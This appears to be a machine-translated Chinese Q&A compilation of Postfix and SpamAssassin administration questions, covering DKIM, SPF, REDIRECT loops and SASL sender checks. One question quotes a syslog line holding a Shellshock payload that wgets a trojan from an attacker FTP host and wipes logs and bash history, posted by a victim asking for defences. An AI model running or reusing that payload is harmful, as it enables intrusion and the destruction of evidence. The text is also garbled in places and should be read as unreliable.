我已经在我的Ubuntu 16.04 digitalocean vps中安装并configuration了OpenDKIM,并且启用了SpamAssassin中的DKIM插件,并在/etc/spamassassin/中的.pre文件之一中.pre loadplugin Mail::SpamAssassin::Plugin::DKIM 。 Mail::DKIM perl模块由Jason Long及其所有依赖项组成,我可以通过浏览这个位置/usr/share/perl5/Mail/DKIM/来validation模块已经成功安装。 在安装了Perl模块之后,我重启了spamassassin。 我也testing了一切,我可以validationDKIMvalidation工作正常,就像它应该 。 我可以用这个头来validation这个: X-Spam-Status: No, score=0.6 required=5.0 tests=DKIM_SIGNED,DKIM_VALID, DKIM_VALID_AU,FREEMAIL_FROM,HTML_MESSAGE,MPART_ALT_DIFF,SPF_PASS, TVD_SPACE_RATIO autolearn=no autolearn_force=no version=3.4.1 但是我的问题开始后,我重新启动/重新启动/closures我的VPS。 所有传入的电子邮件将被标记为T_DKIM_INVALID除非您再次重新启动spamassassin。 我的意思是重新启动spamassassin是,执行此命令通过SSH: service spamassassin restart ..重新启动spamassassin后,一切工作正常。 这是重新启动spamassassin之前和重新启动后的电子邮件标题: X-Spam-Status: No, score=0.0 required=5.0 tests=FREEMAIL_FROM,HTML_MESSAGE, SPF_PASS,T_DKIM_INVALID autolearn=ham autolearn_force=no version=3.4.1 我希望它正常工作,因为每当我的服务器遇到意外的停机时间,我不必重新启动spamassassin。 我希望它启动后立即工作。 手动重新启动它,每次我重新启动机器是荒谬的。 这件事让我疯狂! 你能告诉我我的电子邮件服务器有什么问题吗?
我configuration了一个自定义的前队列filter脚本(fuglu),它首先检查每个传入的电子邮件,然后添加以下标题的Postfix: X-Fuglu-Test: Test Email 在后缀中,我configuration了一个标题检查redirect电子邮件匹配头如上所示: /^X-Fuglu-Test:\sTest\sEmail/ REDIRECT [email protected] 在MTA上发送到[email protected]邮件已成功redirect到[email protected] ,这是一个不同MTA上的用户。 但是,作为redirect的一部分,Postfix [email protected]将[email protected]作为原始收件人。 我观察到的是,Postfix将CC和REDIRECT一起发送到最近的中继MTA。 MTA按照预期提供给[email protected] ,同时也将邮件路由回[email protected]再次遇到filter,然后重新进入[email protected] ,并且无限次地。 在header_check REDIRECT过程中阻止Postfix执行CC的任何方法? 以下是我的/var/log/maillog外观: Jul 28 20:50:39 mta postfix/smtpd[4501]: connect from unknown[10.102.252.61] Jul 28 20:50:39 mta postfix/smtpd[4504]: connect from localhost[127.0.0.1] Jul 28 20:50:39 mta postfix/smtpd[4501]: NOQUEUE: client=unknown[10.102.252.61] Jul 28 20:50:39 mta postfix/smtpd[4504]: A520EA0437: client=unknown[10.102.252.61] Jul 28 20:50:40 mta postfix/smtpd[4506]: connect […]
昨天我收到一封邮件,发送邮件{@DOMAIN.ORG,邮件被标记为垃圾邮件。 正文包含脚本下载命令,如ftp://ftp.ugotownedz.org/upfile2.sh 来自syslog的行 Aug 14 19:25:00 hoeschen-vserv postfix/smtpd[20965]: connect from pacific1392.us.unmetered.com[209.239.123.82] Aug 14 19:25:01 hoeschen-vserv postfix/smtpd[20965]: 25B9ADC1075: client=pacific1392.us.unmetered.com[209.239.123.82] Aug 14 19:25:02 hoeschen-vserv postfix/cleanup[20969]: 25B9ADC1075: message-id=() { :; }; /bin/bash -c "mkdir /var/.udp; wget ftp://ftp.ugotownedz.org/Xorg -O … -rf /root/.bash_history; rm -rf /var/log/*" 事实上,这个非常简单的未encryption的shell脚本试图build立一个木马。 对我来说,这看起来很肮脏,并没有成功。 但无论如何,有什么我可以做的保护postfix反对这些types的黑客? 从脚本 … echo sshdo.ico >> /tmp/upfile for file in $(cat /tmp/upfile); […]
我的一些用户在/etc/postfix/virtual中有其他提供者(主要是gmail)的别名。 我相信所有邮件都被转发(甚至是垃圾邮件)的事实正在导致我的IP信誉问题。 如何阻止SpamAssasin所说的垃圾邮件转发,同时仍然向本地(非转发)用户提供垃圾邮件?
我正在使用Postfix邮件服务器。 我如何统计一小时内从一个帐户发送的电子邮件数量?
我使用的是后缀从我自己的域和postfix-policyd-spf-perl发送邮件来检查SPF。 只有当我从我自己的域发送电子邮件到我自己的域时,SPF检查才会失败。 综上所述 : mydomain – > gmail.com(SPF的作品,gmail可以检查我的SPF) gmail.com – > mydomain(SPF的作品,我可以检查gmail.com的SPF) mydomain – > mydomain(SPF失败) 在日志search后,我发现,当我发送电子邮件到我自己的域时,ipaddr发件人是客户端而不是服务器。 如果我的邮件客户端不在公司networking中,则ipaddr不在保留的IP地址范围内。 我认为这就是SPF失败的原因。 TLS使用让我们encryption证书。 LDAP用于存储用户凭据。 鸽舍被用作LDA。 OpenDKIM,OpenDMARC和SpamAssassin被用作更年期者。 他们都工作(除了因为SPF OpenDMARC)。 什么conf文件,我需要改变,使这个作品? main.cf compatibility_level = 2 queue_directory = /var/spool/postfix command_directory = /usr/sbin daemon_directory = /usr/lib/postfix data_directory = /var/lib/postfix mail_owner = postfix myorigin = $mydomain mydestination = $myhostname, localhost.$mydomain, localhost local_transport = […]
Postfix文档读取 默认情况下,Postfix只在地址validation探测器上和在发件人地址中包含UTF-8,在收件人地址中包含UTF-8,或在消息头值中包含UTF-8的Postfix sendmail中设置“SMTPUTF8请求”标志。 然后它说 但是,如果您具有非ASCII myorigin或mydomain设置,或者如果您具有引入具有虚拟别名,规范映射或BCC映射的UTF-8地址的configuration,则可能必须将SMTPUTF8自动检测应用于所有电子邮件 这是否意味着通过MySQL的用户可configuration的别名,可以有UTF8字符,我应该设置smtputf8_autodetect_classes = all ?
我已经阅读了数以百计的互联网上的post,我找不到任何解决我的问题。 所以我决定写这个post,希望有人能帮助我。 首先我要为我的坏英语道歉,希望你明白我的意思,如果不是不要麻烦的提问。 问题: 我有限制saslauthentication的用户发送邮件只是从后缀configuration的问题。 我知道这可以通过使用postfix main.cf中的“reject_sender_login_mismatch”和“smtpd_sender_login_maps”标签来完成。 但问题接缝,后缀不匹配的邮件字段对smtpd_sender_login_maps相反,它匹配sasl用户名(在我的情况下,也是一个电子邮件地址)。 清楚的是,这个条件总是成立的,因为sasl用户名不存在真正写在FROM字段中的东西。 当我打开debugging(debug_peer_list = client ip )时,我注意到了这一点,并从Thunderbird的欺骗地址any_other@any_other.xy发送邮件到[email protected]。 我没有在mail.log中看到真正的FROM字段,而是将sasllogin名([email protected])解释为FROM地址。 解压缩表格/var/log/mail.log: …. postfix/smtps/smtpd[3525]: watchdog_pat: 0xXXXXXXXXX postfix/smtps/smtpd[3525]: < unknown[XXXXXXXXX]: AUTH PLAIN XXXXXXXXX postfix/smtps/smtpd[3525]: query milter states for other event postfix/smtps/smtpd[3525]: milter8_other_event: milter local:/opendkim/opendkim.sock postfix/smtps/smtpd[3525]: xsasl_dovecot_server_first: sasl_method PLAIN, init_response XXXXXXXXX postfix/smtps/smtpd[3525]: xsasl_dovecot_handle_reply: auth reply: [email protected]? postfix/smtps/smtpd[3525]: > unknown[XXXXXXXXX]: 235 2.7.0 Authentication successful […]
我有这个奇怪的问题,我的imacs不能联系postfix。 我的MacBook和iPhone工作正常,他们在同一个networking上。 iphone有一段时间类似的问题,但神奇似乎已经解决了(我切换到端口465,并回到578做的伎俩)。 这是我在服务器日志中看到的,当我尝试设置一个邮件服务器帐户与他们: Aug 10 20:56:29 www postfix/smtpd[13919]: read from 5618FB3E6F90 [5618FB3F6290] (11 bytes => -1 (0xFFFFFFFFFFFFFFFF)) 任何人都会说这是一个本地客户端问题。 但我不知道除了完全删除Mail.app或plist文件还有什么其他的办法。 有没有人有过这个问题?
ps aux | grep spamd root 12207 0.0 1.0 159920 83460 ? Ss 17:38 0:01 /usr/sbin/spamd -d –pidfile=/var/run/spamassassin.pid –create-prefs –max-children 5 –helper-home-dir root 12208 0.0 0.9 160484 79996 ? S 17:38 0:00 spamd child root 12209 0.0 0.9 159920 77788 ? S 17:38 0:00 spamd child postfix 16307 0.0 0.1 104608 8816 ? S 19:18 […]